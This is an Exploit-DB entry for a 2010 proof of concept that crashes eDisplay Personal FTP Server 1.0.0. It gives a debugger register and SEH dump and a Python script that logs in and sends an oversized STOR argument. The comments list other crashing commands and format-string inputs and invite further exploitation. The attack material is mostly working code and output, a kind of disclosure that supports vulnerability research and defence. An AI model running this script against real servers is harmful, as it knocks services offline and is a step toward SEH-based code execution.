eDisplay Personal FTP Server 1.0.0 - (Authenticated) Multiple Crashs (SEH) (PoC)

EDB-ID:

11810

CVE:

N/A

EDB Verified:

Author:

loneferret

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2010-03-19

Vulnerable App: 
# Title: eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Crash (PoC)
# From: The eh?-Team || The Great White Fuzz (we're not sure yet)
# Found by: loneferret
# Hat's off to dookie2000ca
# Disvovery date: 16/03/2010
# Software link: http://edisplay-personal-ftp-server.software.informer.com/
# Tested on: Windows XP SP3 Professional
# Nod to the Exploit-DB Team

# Vendor informed via email : 17/03/2010

#THE README PART
#The STOR command will crash the server and overwrite a few interesting CPU registers (as shown below).
#Other commands that will gives similar results are: CD / MKD / RMD They all overwrite SEH in the same
#manner as the STOR command.
#During our research, we discovered many other DoS possibilities. These character combinations (%s & %n like DELE) 
#are pretty good at crashing this application.
#As always, if someone wishes to take this further go right ahead. Play nice, and remember where you got it from.
#Thank you.


#SEH chain of main thread
#Address SE handler
#0012C888 41414141

#EAX 7EFEFEFE
#ECX 0012FEF8 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\AAAAAAAA,,,,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EDX 41414141
#EBX 0139B8D0
#ESP 0012C30C
#EBP 0012C894 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAA\AAAAAAAAAAAAAAAAAA
#ESI 00000000
#EDI 0012FFFD
#EIP 50E14321 FtpSer_1.50E14321
#C 0 ES 0023 32bit 0(FFFFFFFF)
#P 1 CS 001B 32bit 0(FFFFFFFF)
#A 0 SS 0023 32bit 0(FFFFFFFF)
#Z 1 DS 0023 32bit 0(FFFFFFFF)
#S 0 FS 003B 32bit 7FFDF000(FFF)
#T 0 GS 0000 NULL
#D 0
#O 0 LastErr ERROR_SUCCESS (00000000)
#EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
#ST0 empty %#.19L
#ST1 empty %#.19L
#ST2 empty +UNORM 19C4 00000000 7FFDF000
#ST3 empty -NAN FFFF 805970D5 F6B61A24
#ST4 empty -UNORM F000 0012FFA8 7FFDF6CC
#ST5 empty +UNORM 0010 00000000 F6B62000
#ST6 empty 0.0
#ST7 empty 45901.499999999995440
# 3 2 1 0 E S P U O Z D I
#FST 0100 Cond 0 0 0 1 Err 0 0 0 0 0 0 0 0 (LT)
#FCW 137F Prec NEAR,64 Mask 1 1 1 1 1 1

#!/usr/bin/python

import socket

buffer= "\x41" * 270

print "Fuzzing CD\r\n"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS test\r\n')
s.recv(1024)
s.send('STOR ' + buffer + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
s.close
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services